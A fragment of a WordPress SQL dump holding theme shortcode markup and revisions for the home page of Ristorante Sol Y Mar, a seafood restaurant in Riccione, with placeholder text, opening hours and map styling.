`{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Richieste\" content_padding=\"124px 0\" email=\"info@ristorantesolymar.it\" link=\"mailto:info@ristorantesolymar.it\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','publish','closed','closed','','main-home','','','2021-01-20 18:46:14','2021-01-20 17:46:14','',0,'http://attika.mikado-themes.com/?page_id=81',0,'page','',0),(3976,1,'2021-01-20 18:39:37','2021-01-20 17:39:37','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"][/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Alta qualità\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.\r\nCucina di Pesce, proposte vegetariane\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"Prenota\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Pranzo\" text_top=\"Dal martedì alla domenica h. 12.00 / 14.30\" button_link=\"https://www.ristorantesolymar.it/opening-hours/\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Richieste\" content_padding=\"124px 0\" email=\"info@ristorantesolymar.it\" link=\"mailto:info@ristorantesolymar.it\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2021-01-20 18:39:37','2021-01-20 17:39:37','',3040,'https://www.ristorantesolymar.it/2021/01/20/3040-revision-v1/',0,'revision','',0),(3975,1,'2021-01-20 18:37:11','2021-01-20 17:37:11','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][vc_zigzag][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.\r\nCucina di Pesce, proposte vegetariane\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"Prenota\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Pranzo\" text_top=\"Dal martedì alla domenica h. 12.00 / 14.30\" button_link=\"https://www.ristorantesolymar.it/opening-hours/\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: 